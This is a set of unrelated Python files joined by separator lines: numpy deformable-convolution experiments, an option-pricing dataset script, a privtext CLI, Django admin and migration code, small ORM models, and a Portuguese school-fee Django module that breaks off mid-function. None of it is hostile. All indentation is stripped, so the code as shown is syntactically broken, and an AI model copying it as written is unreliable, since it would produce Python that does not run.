if dilation != 1:
#check the dims as being square
# space -> batch
# NCHW
N, C, H, W = out.shape
# HCNW
out = out.transpose(2, 1, 0, 3)
new_N = N // dilation
new_W = W * dilation
out = out.reshape(H, C, new_N, new_W)
# WCNH
out = out.transpose(3, 1, 2, 0)
new_H = H * dilation
new_N = new_N // dilation
out = out.reshape(new_W, C, new_N, new_H)
# NCHW
out = out.transpose(2, 1, 3, 0)
return out
def _to_bc_h_w_2(o):
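# (b, 2c, h, w) -> (b*c, h, w, 2): split the channel axis into per-channel
# two-component offsets in the layout expected by np_batch_map_offsets.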
shp = o.shape
o = o.transpose(2, 3, 0, 1)
o = o.reshape((shp[2], shp[3], shp[0] * shp[1] // 2, 2))
# bc h w 2
return o.transpose(2, 0, 1, 3)
def _to_bc_h_w(x):
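# (b, c, h, w) -> (b*c, h, w): fold channels into the batch axis so each
# channel is resampled independently.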
shp = x.shape
x = x.transpose(2, 3, 0, 1)
x = x.reshape((shp[2], shp[3], shp[0] * shp[1]))
return x.transpose(2, 0, 1)
def _to_b_c_h_w(x_o, shp):
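# (b*c, h, w) -> (b, c, h, w): inverse of _to_bc_h_w, using the original shape.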
x_n = x_o.transpose(1, 2, 0)
x_n = x_n.reshape((shp[2], shp[3], shp[0], shp[1]))
return x_n.transpose(2, 3, 0, 1)
def conv_offset2(x, w, pad="same"):
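# Deformable-convolution style sampling: a plain convolution predicts a
# two-component offset for every channel and spatial position, the input is
# bilinearly resampled at those offset locations, and both the resampled
# feature map and the reshaped offsets are returned.
# Shape sketch: x (N, C, H, W) with w (2C, C, k, k) gives
# x_offset (N, C, H, W) and offsets (N, C, H, W, 2).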
x_shape = x.shape
o_offsets = conv2(x, w, None, pad="same")
# clip these offsets?
offsets = _to_bc_h_w_2(o_offsets)
x_r = _to_bc_h_w(x)
x_offset = np_batch_map_offsets(x_r, offsets)
x_offset = _to_b_c_h_w(x_offset, x_shape)
shp = o_offsets.shape
o_offsets = o_offsets.transpose(0, 2, 3, 1).reshape((shp[0], shp[2], shp[3], shp[1] // 2, 2))
o_offsets = o_offsets.transpose(0, 3, 1, 2, 4)
return x_offset, o_offsets
def mid_crop(arr, crop_h, crop_w):
n, c, h, w = arr.shape
if h < crop_h:
raise ValueError("Can't crop larger crop_h")
if w < crop_w:
raise ValueError("Can't crop larger crop_w")
diff_h = abs(crop_h - h)
diff_w = abs(crop_w - w)
out = arr
if diff_h == 0:
out = out
elif diff_h == 1:
out = out[:, :, 1:, :]
elif diff_h % 2 == 0:
out = out[:, :, diff_h // 2:-diff_h // 2, :]
else:
out = out[:, :, diff_h // 2:-diff_h // 2, :]
if diff_w == 0:
out = out
elif diff_w == 1:
out = out[:, :, :, 1:]
elif diff_w % 2 == 0:
out = out[:, :, :, diff_w // 2:-diff_w // 2]
else:
out = out[:, :, :, diff_w // 2:-diff_w // 2]
return out
def crop_match(*args):
min_h = np.inf
min_w = np.inf
for arg in args:
n, c, h, w = arg.shape
if h < min_h:
min_h = h
if w < min_w:
min_w = w
crop_args = []
for a in args:
crop_args.append(mid_crop(a, min_h, min_w))
return crop_args
def imshow(arr):
plt.imshow(arr)
plt.show()
def arrshow(arr, ax=None, cmap=None):
# nchw -> hwc
i = arr[0].transpose(1, 2, 0)
if cmap is None:
cmap_n = "viridis"
else:
cmap_n = cmap
if i.shape[-1] == 1:
i = i[:, :, 0]
if cmap is None:
cmap_n = "gray"
else:
cmap_n = cmap
if ax is None:
plt.imshow(i, cmap=cmap_n)
plt.show()
else:
ax.imshow(i, cmap=cmap_n)
def make_conv_params(input_dim, output_dim, kernel):
#w_o = np.ones((output_dim, input_dim, kernel, kernel), dtype="float32")
#b_o = np.ones((output_dim,), dtype="float32")
random_state = np.random.RandomState(0)
w_o = .01 * random_state.randn(output_dim, input_dim, kernel, kernel).astype("float32")
b_o = np.zeros((output_dim,), dtype="float32")
return w_o, b_o
# Modified from Felix Lau, MIT License
def np_map_coordinates(inp, coords, order=1):
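# Bilinear (order=1) interpolation of a 2D array at fractional (row, col)
# coordinates; numpy-only counterpart of scipy's map_coordinates.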
assert order == 1
coords_lt = np.cast["int32"](np.floor(coords))
coords_rb = np.cast["int32"](np.ceil(coords))
coords_lb = np.asarray((coords_lt[:, 0], coords_rb[:, 1])).transpose(1, 0)
coords_rt = np.asarray((coords_rb[:, 0], coords_lt[:, 1])).transpose(1, 0)
def fancy_take(a1, ind):
flat_ind = a1.shape[1] * ind[:, 0] + ind[:, 1]
return np.take(a1, flat_ind).copy()
vals_lt = fancy_take(inp, coords_lt)
vals_rb = fancy_take(inp, coords_rb)
vals_lb = fancy_take(inp, coords_lb)
vals_rt = fancy_take(inp, coords_rt)
coords_offset_lt = coords - np.cast["float32"](coords_lt)
vals_t = vals_lt + (vals_rt - vals_lt) * coords_offset_lt[:, 0]
vals_b = vals_lb + (vals_rb - vals_lb) * coords_offset_lt[:, 0]
mapped_vals = vals_t + (vals_b - vals_t) * coords_offset_lt[:, 1]
return mapped_vals
def np_batch_map_coordinates(inp, coords, order=1):
assert order == 1
coords = coords.clip(0, inp.shape[1] - 1)
mapped_vals = np.array([np_map_coordinates(inp, coord)
for inp, coord in zip(inp, coords)])
return mapped_vals
def np_batch_map_offsets(inp, offsets):
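# Add per-pixel offsets to a regular sampling grid and bilinearly interpolate
# each image in the batch at the resulting coordinates (assumes square inputs:
# inp is (B, S, S) and offsets reshape to (B, S*S, 2)).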
batch_size = inp.shape[0]
input_size = inp.shape[1]
offsets = offsets.reshape(batch_size, -1, 2)
grid = np.stack(np.mgrid[:input_size, :input_size], -1).reshape(-1, 2)
grid = np.repeat([grid], batch_size, axis=0)
coords = offsets + grid
coords = coords.clip(0, input_size - 1)
mapped_vals = np_batch_map_coordinates(inp, coords)
mapped_vals = mapped_vals.reshape(batch_size, input_size, input_size)
return mapped_vals
def sp_map_coordinates(inp, coords, order=1):
return sp.ndimage.interpolation.map_coordinates(inp, coords.T,
mode="nearest", order=order)
def sp_batch_map_coordinates(inp, coords, order=1):
assert order == 1
coords = coords.clip(0, inp.shape[1] - 1)
mapped_vals = np.array([sp_map_coordinates(inp, coord)
for inp, coord in zip(inp, coords)])
return mapped_vals
def sp_batch_map_offsets(inp, offsets):
batch_size = inp.shape[0]
input_size = inp.shape[1]
offsets = offsets.reshape(batch_size, -1, 2)
grid = np.stack(np.mgrid[:input_size, :input_size], -1).reshape(-1, 2)
grid = np.repeat([grid], batch_size, axis=0)
coords = offsets + grid
coords = coords.clip(0, input_size - 1)
mapped_vals = sp_batch_map_coordinates(inp, coords)
mapped_vals = mapped_vals.reshape(batch_size, input_size, input_size)
return mapped_vals
fname = "napoleon_sloth.png"
# rgba image
img_arr = imread(fname)
# rgb image
img_arr = img_arr[:200, :200, :3]
# gray image
img_arr = np.dot(img_arr, np.array([.2126, 0.7152, 0.0722]))
"""
plt.imshow(img_arr, cmap="gray")
plt.savefig("tmp.png")
"""
"""
inp = np.random.random((100, 100))
coords = np.random.random((200, 2)) * 99
r1 = sp_map_coordinates(inp, coords)
r2 = np_map_coordinates(inp, coords)
assert np.abs(r2 - r1).max() < 1E-6
inp = np.random.random((4, 100, 100))
coords = np.random.random((4, 200, 2)) * 99
rr1 = sp_batch_map_coordinates(inp, coords)
rr2 = np_batch_map_coordinates(inp, coords)
assert np.abs(rr2 - rr1).max() < 1E-6
inp = np.random.random((4, 100, 100))
offsets = np.random.random((4, 100, 100, 2)) * 2
rrr1 = sp_batch_map_offsets(inp, offsets)
rrr2 = np_batch_map_offsets(inp, offsets)
assert np.abs(rrr2 - rrr1).max() < 1E-6
"""
mb = img_arr[None, :, :, None]
# transpose to NCHW
mb = mb.transpose(0, 3, 1, 2)
minibatch_size = 1
in_dim = 1
n_filt = 32
kernel = 3
# conv parameters
np_w, np_b = make_conv_params(in_dim, n_filt, kernel)
a1_o = conv2(mb, np_w, np_b, pad="same")
# offset conv parameters
np_o_w2, _ = make_conv_params(n_filt, 2 * n_filt, kernel)
np_w2, np_b2 = make_conv_params(n_filt, n_filt, kernel)
a2_offset, a2_offset_p = conv_offset2(a1_o, np_o_w2, pad="same")
a2_o = conv2(a2_offset, np_w2, np_b2, pad="same")
# offset conv parameters
np_o_w3, _ = make_conv_params(n_filt, 2 * n_filt, kernel)
np_w3, np_b3 = make_conv_params(n_filt, n_filt, kernel)
a3_offset, a3_offset_p = conv_offset2(a2_o, np_o_w3, pad="same")
a3_o = conv2(a3_offset, np_w3, np_b3, pad="same")
# offset conv parameters
np_o_w4, _ = make_conv_params(n_filt, 2 * n_filt, kernel)
np_w4, np_b4 = make_conv_params(n_filt, n_filt, kernel)
# mb or a3_o?
a4_offset, a4_offset_p = conv_offset2(a3_o, np_o_w4, pad="same")
a4_o = conv2(a4_offset, np_w4, np_b4, pad="same")
"""
a1 = a1_o #conv2(mb, np_w, np_b, stride=1, dilation=1, pad="same")
a3 = conv2(a2_offset, np_w2, np_b2, stride=1, dilation=4, pad="same")
a5 = conv2(a3_offset, np_w3, np_b3, stride=1, dilation=8, pad="same")
a7 = conv2(a4_offset, np_w4, np_b4, stride=1, dilation=16, pad="same")
"""
"""
a1 = conv2(mb, np_w, np_b, stride=1, dilation=1, pad="same")
a3 = conv2(mb, np_w, np_b, stride=1, dilation=4, pad="same")
a5 = conv2(mb, np_w, np_b, stride=1, dilation=8, pad="same")
a7 = conv2(mb, np_w, np_b, stride=1, dilation=16, pad="same")
"""
a1 = a1_o
a3 = a2_o
a5 = a3_o
a7 = a4_o
a1, a3, a5, a7 = crop_match(a1, a3, a5, a7)
def stack(*args):
return np.concatenate([a[..., None] for a in args], axis=-1)
def apply_weights(stacked_arr, hw, ww, sw):
# stacked_arr is 5D
# n_samples, n_channels, height, width, scales
# hw height weights
# ww width weights
# sw scale weights
a_w = ww[None] * hw[:, None]
hww = a_w
a_w = a_w[:, :, None] * sw[None, None]
a_w = a_w[None, None]
o = (a_w * stacked_arr).sum(axis=-1)
return o, hww, a_w
r3 = stack(a1, a3, a5, a7)
#r3 = stack(a1, a3, a5)
random_state = np.random.RandomState(1999)
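# Weighting functions used to mix the stacked feature maps: a parabolic
# profile across height and width, and random weights across the scale axis.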
def h_x(size):
hw = np.linspace(0, 1, size) - 0.5
hw = -hw ** 2 + 0.5
return hw
def w_x(size):
ww = np.linspace(0, 1, size) - 0.5
ww = -ww ** 2 + 0.5
return ww
def s_x(size):
sw = random_state.rand(size)
return sw
hw = h_x(r3.shape[2])
ww = w_x(r3.shape[3])
sw = s_x(r3.shape[4])
r, hww, w = apply_weights(r3, hw, ww, sw)
def megaplot(im, final_im, stack, hw, ww, sw, kernel_offset):
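# Composite figure: the input image and one channel of each stacked scale on
# the top row; below, the scale weights, the height/width weight profiles and
# the weighted output for the selected kernel.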
f = plt.figure()
n_scales = stack.shape[-1]
if n_scales < 3:
raise ValueError("Cannot plot < 3 scales")
n_y = n_scales + 3
n_x = n_scales + 1
gs1 = gridspec.GridSpec(n_y, n_x)
a = []
for i in range(n_scales + 1):
a.append(plt.subplot(gs1[0, i]))
ax2 = plt.subplot(gs1[1, 1:])
ax3_2 = plt.subplot(gs1[2:n_x - 1, 1:])
#ax3_1 = plt.subplot(gs1[2:n_x - 1, 0], sharey=ax3_2)
ax3_1 = plt.subplot(gs1[2:n_x - 1, 0])
ax4_1 = plt.subplot(gs1[n_x - 1, 0])
#ax4_2 = plt.subplot(gs1[n_x - 1, 1:], sharex=ax3_2)
ax4_2 = plt.subplot(gs1[n_x - 1, 1:])
arrshow(im, a[0], cmap="gray")
for i in range(1, n_scales + 1):
sim = stack[0, kernel_offset:kernel_offset+1, :, :, i - 1][0]
a[i].imshow(sim, cmap="gray")
ax2.plot(sw)
ax3_1.plot(hw, np.arange(len(hw)))
ax3_1.invert_yaxis()
ax4_1.imshow(hww, cmap="gray")
ax4_2.plot(ww)
arrshow(final_im[:, kernel_offset:kernel_offset+1], ax3_2)
plt.show()
for j in range(n_filt):
megaplot(mb, r, r3, hw, ww, sw, j)
plt.savefig("tmp{}.png".format(j))
plt.show()
|
import pandas as pd
from numpy.random import default_rng
from monte_carlo.dataset_maker import _get_price
from settings import OPTIONS_PARAMS_RANDOM_SEED
from utils.typing import OptionAvgType
VARIABLE_PARAMS_NUMBER = 4
ENTRIES_NUMBER = 10000
def create_fixed_datasets():
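# Generate one dataset per input parameter: the selected parameter is drawn
# at random while the remaining ones are held fixed, then Monte Carlo prices
# (with confidence intervals) are appended and the result written to CSV.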
rng = default_rng(OPTIONS_PARAMS_RANDOM_SEED)
for i in range(VARIABLE_PARAMS_NUMBER):
print(i)
data = {
'spot_strike_ratio': (0.5 + rng.random(ENTRIES_NUMBER)) if i == 0 else 1,
'ttm': (0.5 + rng.random(ENTRIES_NUMBER)) if i == 1 else 1,
'risk_free_rate': (rng.random(ENTRIES_NUMBER) * 0.2) if i == 2 else 0.1,
'volatility': (0.05 + rng.random(ENTRIES_NUMBER) * 0.5) if i == 3 else 0.2,
'avg_type': OptionAvgType.ARITHMETIC.value,
}
df = pd.DataFrame(data=data)
price_and_ci_df = df.apply(_get_price, axis=1, result_type='expand')
price_and_ci_df.columns = ['price_strike_ratio', 'left_ci', 'right_ci']
df = pd.concat([df, price_and_ci_df], axis=1)
idx_to_param = {
0: 'spot',
1: 'ttm',
2: 'rate',
3: 'vol'
}
df.to_csv(f'../fixed_{idx_to_param[i]}_dataset.csv', index=False, float_format='%.4f')
if __name__ == '__main__':
create_fixed_datasets()
|
#-*- coding: utf-8 -*-
import sys, os
from privtext.env import _TEST_MODE
from privtext.args import get_args
from privtext.utils import cross_input
from privtext import PrivateText
import re
def run(args=None):
if args is None:
args = sys.argv[1:]
args = get_args(args=args)
if os.isatty(sys.stdout.fileno()):
private = PrivateText(keysize=args.keysize, password=args.password, timelive=args.lifetime, email=args.email, debug_mode=_TEST_MODE)
private.set('split_lines', args.split_lines)
l = len(args.text)
r = re.compile('^https://privtext\\.com/([^/#]+)(#(.+))?$', flags=re.I)
m = r.search(args.text)
if not m is None:
noteid = m.group(1)
password = m.group(3)
if password is None or len(password) == 0:
password = private.get('password')
if not password:
print('You must provide a password for note `%s`, either in the link (#password) or with the -p/--password flag. See --help for more info.' % noteid)
sys.exit(-1)
private.set('password', password)
private.set('noteid', noteid)
else:
if l > 0:
private.set('text', args.text)
elif not args.file is None:
private.set('inputfile', args.file)
if not args.outfile is None:
private.set('outfile', args.outfile)
if not m is None:
private.read()
else:
private.send()
private.printout()
# print("Please, press [Enter] for exit...")
# cross_input()
else:
print('Only for console/terminal')
if __name__ == '__main__':
run()
|
import locale
import icu
from django.contrib import admin
from django.contrib.auth import get_user_model
from django.http import Http404
from django.template.response import TemplateResponse
from django.utils.translation import ugettext_lazy as _
from . import ( # NOQA
account,
agegroup,
agreements,
citizenship,
courses,
department,
donation,
events,
journals,
leprikonsite,
messages,
orderables,
organizations,
place,
printsetup,
question,
refundrequest,
registrationlink,
roles,
school,
schoolyear,
subjects,
targetgroup,
timesheets,
transaction,
user,
)
User = get_user_model()
admin.site.site_header = _("Leprikon administration")
admin.site.site_title = _("Leprikon administration")
def app_index(self, request, app_label, extra_context=None):
app_dict = self._build_app_dict(request, app_label)
if not app_dict:
raise Http404("The requested admin page does not exist.")
# Sort the models alphabetically within each app.
collator = icu.Collator.createInstance(icu.Locale(".".join(locale.getlocale())))
app_dict["models"].sort(key=lambda x: collator.getSortKey(x["name"].lower()))
context = dict(
self.each_context(request),
title=_("Leprikon administration"),
app_list=[app_dict],
app_label=app_label,
)
context.update(extra_context or {})
request.current_app = self.name
return TemplateResponse(
request, self.app_index_template or ["admin/%s/app_index.html" % app_label, "admin/app_index.html"], context
)
def get_app_list(self, request):
"""
Returns a sorted list of all the installed apps that have been
registered in this site.
"""
collator = icu.Collator.createInstance(icu.Locale(".".join(locale.getlocale())))
app_dict = self._build_app_dict(request)
# Sort the apps alphabetically.
app_list = sorted(app_dict.values(), key=lambda x: collator.getSortKey(x["name"].lower()))
# Sort the models alphabetically within each app.
for app in app_list:
app["models"].sort(key=lambda x: collator.getSortKey(x["name"].lower()))
return app_list
# override default Admin site's app_index and get_app_list
admin.sites.AdminSite.app_index = app_index
admin.sites.AdminSite.get_app_list = get_app_list
|
__version__ = '3.7.13'
|
# setup.py
from setuptools import find_packages, setup
setup(
name="rl_toolkit",
version="0.0.0",
packages=find_packages(exclude=["docs", "scripts", "tests"]),
install_requires=[
"gym",
"gym_fishing",
"gym_conservation",
"numpy",
"pandas",
"matplotlib",
"stable_baselines3",
],
extras_require={
"tests": [
# Run tests and coverage
"pytest",
"pytest-cov",
"pytest-env",
"pytest-xdist",
# Type check
"pytype",
# Lint code
"flake8>=3.8",
# Sort imports
"isort>=5.0",
# Reformat
"black",
],
"docs": [
"sphinx",
"sphinx-autobuild",
"sphinx-rtd-theme",
# For spelling
"sphinxcontrib.spelling",
# Type hints support
"sphinx-autodoc-typehints",
],
},
)
|
# Generated by Django 2.1.4 on 2019-09-20 21:40
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('river', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='transitionapproval',
name='destination_state',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='transition_approvals_as_destination', to='river.State', verbose_name='Next State'),
),
migrations.AlterField(
model_name='transitionapproval',
name='meta',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='transition_approvals', to='river.TransitionApprovalMeta', verbose_name='Meta'),
),
migrations.AlterField(
model_name='transitionapproval',
name='source_state',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='transition_approvals_as_source', to='river.State', verbose_name='Source State'),
),
migrations.AlterField(
model_name='transitionapproval',
name='transactioner',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='Transactioner'),
),
migrations.AlterField(
model_name='transitionapproval',
name='workflow',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='transition_approvals', to='river.Workflow', verbose_name='Workflow'),
),
]
|
import datetime
from typing import Text
from uuid import uuid4
import bigfastapi.db.database as db
import sqlalchemy.orm as orm
from sqlalchemy.schema import Column
from sqlalchemy.types import String, DateTime, Integer
class qrcode(db.Base):
__tablename__ = "qrcode"
id = Column(String(255), primary_key=True, index=True, default=lambda: uuid4().hex)  # callable default so each row gets a fresh UUID
question = Column(String(255), index=True)
answer = Column(String(700), index=True)
created_by = Column(String(255), index=True)
date_created = Column(DateTime, default=datetime.datetime.utcnow)
|
from __future__ import annotations
from enum import Enum
from datetime import datetime
from jsonclasses import jsonclass, types
from jsonclasses_pymongo import pymongo
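# Example model whose first_name, last_name and score fields are derived from
# other fields through getter transforms instead of being supplied directly.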
@pymongo
@jsonclass(class_graph='simple')
class SimpleCalcUser:
id: str = types.readonly.str.primary.mongoid.required
name: str
first_name: str = types.str.getter(lambda u: u.name.split(" ")[0])
last_name: str = types.str.getter(types.this.fval('name').split(' ').at(1))
base_score: float
score: float = types.float.getter(types.this.fval('base_score').mul(2)).negative
created_at: datetime = types.readonly.datetime.tscreated.required
updated_at: datetime = types.readonly.datetime.tsupdated.required
|
from django.db import models
from django.db.models.signals import post_save
from django.db.models import Sum
from django.dispatch.dispatcher import receiver
from django.shortcuts import render
from datetime import date
from collections import OrderedDict
from alunos.models import Matricula
class Mensalidade(models.Model):
SITUACAO_PENDENTE = 1
SITUACAO_CANCELADA = 2
SITUACAO_PAGA = 3
MES_REFERENCIA_CHOICES = (
(1, 'Janeiro'),
(2, 'Fevereiro'),
(3, 'Março'),
(4, 'Abril'),
(5, 'Maio'),
(6, 'Junho'),
(7, 'Julho'),
(8, 'Agosto'),
(9, 'Setembro'),
(10, 'Outubro'),
(11, 'Novembro'),
(12, 'Dezembro'),
)
SITUACAO_CHOICES = (
(SITUACAO_PENDENTE, 'Pendente'),
(SITUACAO_CANCELADA, 'Cancelada'),
(SITUACAO_PAGA, 'Paga'),
)
matricula = models.ForeignKey(Matricula)
mes_referencia = models.PositiveSmallIntegerField(choices=MES_REFERENCIA_CHOICES)
ano_referencia = models.PositiveIntegerField()
situacao = models.PositiveSmallIntegerField(choices=SITUACAO_CHOICES, default=1)
data_pagamento = models.DateField(null=True)
valor_cobrado = models.DecimalField(max_digits=6, decimal_places=2, \
default=0, verbose_name='Valor cobrado')
valor_pago = models.DecimalField(max_digits=6, decimal_places=2, \
default=0, verbose_name='Valor pago')
class Meta:
verbose_name='Mensalidade'
verbose_name_plural='Mensalidades'
def __str__(self):
return '%s - %s/%s - %s' % (self.matricula.aluno.nome, self.mes_referencia, \
self.ano_referencia, self.situacao)
def get_str_mes_ano(self):
return '%s/%s' % (self.mes_referencia, self.ano_referencia)
def get_data_limite_para_pagamento_em_dia(self):
return date(self.ano_referencia, self.mes_referencia, \
self.matricula.dia_de_vencimento)
def get_pago_em_dia(self):
return self.data_pagamento <= self.get_data_limite_para_pagamento_em_dia()
@receiver(post_save, sender=Matricula)
def matriculas_post_save(sender, instance, **kwargs):
nova_matricula = instance
# get the current month and year
hoje = date.today()
mes_atual = hoje.month
ano_atual = hoje.year
# create the list that will be returned
novas_mensalidades = list()
# for the enrollment passed as a parameter:
# mes_busca = enrollment month
# repeat:
# look for a monthly fee for mes_busca + nova_matricula
# does it exist?
# yes: do nothing
# no: create a new monthly fee for mes_busca + nova_matricula
# with status 'pending'
# while mes_busca < mes_atual
mes_busca = nova_matricula.data_matricula.month
ano_busca = nova_matricula.data_matricula.year
while ano_busca <= ano_atual:
if ano_busca == ano_atual:
#print(' anos iguais (busca e atual) %s - %s' % (ano_busca, ano_atual))
while mes_busca <= mes_atual:
if not (Mensalidade.objects.filter( matricula=nova_matricula, \
mes_referencia=mes_busca, \
ano_referencia=ano_busca).exists()):
#print('GERA MENSALIDADE mes/ano %s/%s' % (mes_busca, ano_busca))
novas_mensalidades.append(gerar_mensalidade(nova_matricula, mes_busca, ano_busca))
mes_busca+=1
else:
#print(' anos dif. (busca e atual) %s - %s' % (ano_busca, ano_atual))
while mes_busca <= 12:
if not (Mensalidade.objects.filter( matricula=nova_matricula, \
mes_referencia=mes_busca, \
ano_referencia=ano_busca).exists()):
#print('GERA MENSALIDADE mes/ano %s/%s' % (mes_busca, ano_busca))
novas_mensalidades.append(gerar_mensalidade(nova_matricula, mes_busca, ano_busca))
mes_busca+=1
else:
mes_busca = 1
ano_busca+=1
#print('\n')
return novas_mensalidades
def gerar_mensalidade(matricula, mes_referencia, ano_referencia):
mensalidade = Mensalidade()
mensalidade.matricula = matricula
mensalidade.mes_referencia = mes_referencia
mensalidade.ano_referencia = ano_referencia
mensalidade.valor_cobrado = matricula.valor_da_mensalidade
mensalidade.save()
return mensalidade
def calcular_mensalidades(request):
# get the current month and year
hoje = date.today()
mes_atual = hoje.month
ano_atual = hoje.year
# create the variables that will be rendered in the template
mensagem_retorno = ''
novas_mensalidades = list()
quantidade_mensalidades_ja_existentes = 0
# fetch all active enrollments
matriculas_ativas = Matricula.objects.filter(situacao_matricula=1) # 1 = ativas
if matriculas_ativas:
mensagem_retorno = 'Gerando mensalidades para matrículas ativas'
for matricula_ativa in matriculas_ativas:
# for each active enrollment:
# mes_busca = enrollment month
# repeat:
# look for a monthly fee for mes_busca + matricula_ativa
# does it exist?
# yes: do nothing
# no: create a new monthly fee for mes_busca + matricula_ativa
# with status 'pending'
# while mes_busca < mes_atual
mes_busca = matricula_ativa.data_matricula.month
ano_busca = matricula_ativa.data_matricula.year
#print('Matrícula ativa: \n')
#print(matricula_ativa)
while ano_busca <= ano_atual:
if ano_busca == ano_atual:
#print(' anos iguais (busca e atual) %s - %s' % (ano_busca, ano_atual))
while mes_busca <= mes_atual:
if not (Mensalidade.objects.filter( matricula=matricula_ativa, \
mes_referencia=mes_busca, \
ano_referencia=ano_busca).exists()):
#print('GERA MENSALIDADE mes/ano %s/%s' % (mes_busca, ano_busca))
novas_mensalidades.append(gerar_mensalidade(matricula_ativa, mes_busca, ano_busca))
else:
#print('Mensalidade mes/ano %s/%s já existe!' % (mes_busca, ano_busca))
quantidade_mensalidades_ja_existentes+=1
mes_busca+=1
else:
#print(' anos dif. (busca e atual) %s - %s' % (ano_busca, ano_atual))
while mes_busca <= 12:
if not (Mensalidade.objects.filter( matricula=matricula_ativa, \
mes_referencia=mes_busca, \
ano_referencia=ano_busca).exists()):
#print('GERA MENSALIDADE mes/ano %s/%s' % (mes_busca, ano_busca))
novas_mensalidades.append(gerar_mensalidade(matricula_ativa, mes_busca, ano_busca))
else:
#print('Mensalidade mes/ano %s/%s já existe!' % (mes_busca, ano_busca))
quantidade_mensalidades_ja_existentes+=1
mes_busca+=1
else:
mes_busca = 1
ano_busca+=1
#print('\n')
else:
mensagem_retorno = 'Não encontrada nenhuma matrícula ativa no sistema!'
context = {'mensagem_retorno': mensagem_retorno, 'novas_mensalidades': novas_mensalidades, \
'quantidade_mensalidades_ja_existentes': quantidade_mensalidades_ja_existentes, }
return render(request,"calcular_mensalidades.html",context)
def buscar_mensalidades_em_atraso(request):
# get the current day, month and year
hoje = date.today()
mes_atual = hoje.month
ano_atual = hoje.year
dia_atual = hoje.day
mensalidades_temp = list()
mensalidades_em_atraso = list()
# run the query
mensalidades_temp = Mensalidade.objects.filter(situacao=Mensalidade.SITUACAO_PENDENTE) \
.order_by('matricula__aluno__nome', '-ano_referencia','-mes_referencia')
for mensalidade in mensalidades_temp:
if mensalidade.get_data_limite_para_pagamento_em_dia() < hoje:
mensalidades_em_atraso.append(mensalidade)
# total the overdue amount per student
matricula_da_vez = None
total_em_atraso_da_vez = 0
total_em_atraso_geral = 0
total_em_atraso_por_aluno = dict()
for mensalidade in mensalidades_em_atraso:
if mensalidade.matricula != matricula_da_vez:
if matricula_da_vez != None:
total_em_atraso_por_aluno[matricula_da_vez.aluno.nome] = total_em_atraso_da_vez
matricula_da_vez = mensalidade.matricula
total_em_atraso_da_vez = 0
total_em_atraso_da_vez += mensalidade.valor_cobrado
total_em_atraso_geral += mensalidade.valor_cobrado
# total for the last student
total_em_atraso_por_aluno[matricula_da_vez.aluno.nome] = total_em_atraso_da_vez
total_em_atraso_por_aluno = OrderedDict(sorted(total_em_atraso_por_aluno.items(), \
key=lambda t: t[0], reverse=False))
# total the overdue amount per month/year
total_em_atraso_por_mes_ano = dict()
for mensalidade in mensalidades_em_atraso:
str_mes_referencia = str(mensalidade.mes_referencia)
if len(str_mes_referencia) == 1:
str_mes_referencia = '0'+str_mes_referencia
str_ano_referencia = str(mensalidade.ano_referencia)
chave = str_ano_referencia+'_'+str_mes_referencia
if chave not in total_em_atraso_por_mes_ano:
total_em_atraso_por_mes_ano[chave] = 0
total_em_atraso_por_mes_ano[chave] += mensalidade.valor_cobrado
total_em_atraso_por_mes_ano = OrderedDict(sorted(total_em_atraso_por_mes_ano.items(), \
key=lambda t: t[0], reverse=True))
mensagem_retorno = ''
mensagem_retorno_2 = ''
if mensalidades_em_atraso:
mensagem_retorno = 'Existem '+str(len(mensalidades_em_atraso))+' mensalidades em atraso!'
mensagem_retorno_2 = '(mensalidades c/ vcto anterior ao dia %s)' % (dia_atual)
else:
mensagem_retorno = 'Não encontrada nenhuma mensalidade em atraso!'
context = {'mensagem_retorno': mensagem_retorno, 'mensagem_retorno_2': mensagem_retorno_2,\
'mensalidades_em_atraso': mensalidades_em_atraso, 'total_em_atraso_por_aluno': \
total_em_atraso_por_aluno, 'total_em_atraso_geral': total_em_atraso_geral, \
'total_em_atraso_por_mes_ano': total_em_atraso_por_mes_ano, }
return render(request,"mensalidades_em_atraso.html",context)
def buscar_mensalidades_recebidas(request):
# number of past months to look back for received monthly fees
NUMERO_MESES_AVALIADOS = 6
# get the current month and year
hoje = date.today()
mes_atual = hoje.month
ano_atual = hoje.year
data_analise_inicial = None # should be the first day of (last month - number of months analysed)
data_analise_final = None # should be the last day of last month
#mes_analise_final = mes_atual - 1
mes_analise_final = mes_atual
ano_analise_final = ano_atual
if mes_analise_final == 0:
mes_analise_final = 12
ano_analise_final -= 1
mes_analise_inicial = mes_analise_final - NUMERO_MESES_AVALIADOS
ano_analise_inicial = ano_analise_final
if mes_analise_inicial <= 0:
mes_analise_inicial = mes_analise_inicial + 12
ano_analise_inicial -= 1
data_analise_inicial = date(ano_analise_inicial,mes_analise_inicial,1)
dia_analise_final = 31
if mes_analise_final == 2:
dia_analise_final = 28
elif mes_analise_final in (4,6,9,11):
dia_analise_final = 30
data_analise_final = date(ano_analise_final,mes_analise_final,dia_analise_final)
mensalidades_recebidas_ultimos_meses = list()
mensalidades_recebidas_neste_mes = list()
mensalidades_a_receber_neste_mes = list()
numero_de_mensalidades_recebidas_ultimos_meses = 0
numero_de_mensalidades_recebidas_neste_mes = 0
numero_de_mensalidades_a_receber_neste_mes = 0
# run the queries
mensalidades_recebidas_neste_mes = Mensalidade.objects.filter(situacao=Mensalidade.SITUACAO_PAGA, \
data_pagamento__gte=(date(ano_atual,mes_atual,1))).order_by('-ano_referencia','-mes_referencia')
mensalidades_a_receber_neste_mes = Mensalidade.objects.filter(situacao=Mensalidade.SITUACAO_PENDENTE, \
ano_referencia=ano_atual,mes_referencia=mes_atual).order_by('-ano_referencia','-mes_referencia')
mensalidades_recebidas_ultimos_meses = Mensalidade.objects.filter(situacao=Mensalidade.SITUACAO_PAGA, \
data_pagamento__range=([data_analise_inicial, data_analise_final])).order_by('-ano_referencia','-mes_referencia')
mensagem_retorno = ''
mensagem_retorno_2 = ''
total_recebido_neste_mes = 0
total_a_receber_neste_mes = 0
total_recebido_por_mes_ano = list()
if mensalidades_a_receber_neste_mes:
numero_de_mensalidades_a_receber_neste_mes = len(mensalidades_a_receber_neste_mes)
for mensalidade in mensalidades_a_receber_neste_mes:
